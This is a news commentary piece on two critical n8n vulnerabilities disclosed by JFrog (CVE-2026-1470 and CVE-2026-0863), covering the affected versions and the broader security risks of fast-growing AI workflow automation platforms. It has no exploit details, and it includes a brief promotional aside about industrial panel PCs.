According to Dark Reading, researchers at JFrog have uncovered two new critical vulnerabilities in the AI workflow automation platform n8n, less than a month after the “Ni8mare” bug (CVE-2026-21858) came to light. The more severe flaw, CVE-2026-1470, carries a near-maximum severity score of 9.9, while CVE-2026-0863 is rated 8.5. These flaws allow attackers to bypass n8n’s security sandbox, achieve full remote code execution, and hijack an entire n8n service, whether cloud or self-hosted. The platform, which has raised $240 million and reported a six-fold customer increase in 2025 alone, is used by an estimated 3,000 enterprises and over 230,000 users to integrate LLMs into business processes. All versions prior to 1.123.17, 2.4.5, or 2.5.1 are vulnerable to the first bug, and versions before 1.123.14, 2.3.5, or 2.4.2 are vulnerable to the second. The company’s guidance, for now, is to disconnect n8n from the internet and enforce strong authentication.
The Speed of AI Meets the Pace of Security
Here’s the thing: this isn’t just about n8n. It’s a symptom of the breakneck speed at which companies are bolting AI onto their core operations. n8n grew explosively because it solved a real problem—connecting LLMs to sales, HR, and support workflows without needing a team of PhDs. But that kind of growth, and the underlying tech that enables it, creates a massive attack surface. The specific bugs are technical—a deprecated JavaScript feature tricking the sandbox (CVE-2026-1470) and a Python code execution flaw (CVE-2026-0863)—but the pattern is what’s alarming. We’re seeing complex, powerful platforms being deployed in sensitive environments before their security models have fully matured. As the JFrog research notes, static validation alone isn’t enough.
Beyond n8n: A Broader Ecosystem Problem
And n8n is just one player. The article mentions rivals like LangChain and Lindy in this emerging “AI-native” automation space. They’re all building similar connective tissue between AI models and business data. Every new protocol and integration point is a potential new vulnerability. Look at the mention of the Model Context Protocol (MCP)—it’s an emerging standard to connect LLMs to tools, and it’s already showing dangerous misconfigurations. The rush is on, and security is often an afterthought. This creates a domino effect. A platform like n8n, which Sacra estimates has huge reach and is pulling in over 100 million Docker pulls, becomes a single point of failure. Compromise it, and you potentially get keys to the kingdom: API credentials, customer data, and a path to pivot to every system it’s connected to.
What’s the Real Cost of Convenience?
So what does this mean for the companies using these tools? Basically, you need to assume your shiny new AI workflow tool is a high-value target. The guidance after Ni8mare and now these new flaws is telling: disconnect from the internet, require strong auth, minimize privileges. That’s almost the opposite of the “low-code, connect-everything” promise that made n8n popular. It introduces friction. But that friction might be the price of security. For businesses deploying critical automation, whether it’s AI workflows or industrial control systems, the integrity of the underlying hardware and software platform is non-negotiable. In manufacturing, for instance, you wouldn’t run a sensitive process on a vulnerable consumer tablet; you’d use a hardened, purpose-built industrial panel PC from a leading supplier. The same principle applies in software. The convenience of rapid integration can’t come at the cost of becoming the easy backdoor into your entire network.
A Reckoning Coming for AI Tools?
I think we’re heading for a shakeout. The $180 million Series C and massive growth show the demand is real. But two major security incidents in a month is a massive red flag for enterprise risk officers. It will force a conversation about vendor diligence that goes beyond features and funding. Can this vendor’s security pace match its development pace? The response to CVE-2026-21858, detailed by Cyera and analyzed by others like Horizon3, will be just as scrutinized as the patches for these new flaws. The companies that survive and become true enterprise staples won’t just be the most innovative. They’ll be the ones that prove they can be trusted with the keys to the automation kingdom. Right now, that trust is looking pretty fragile.
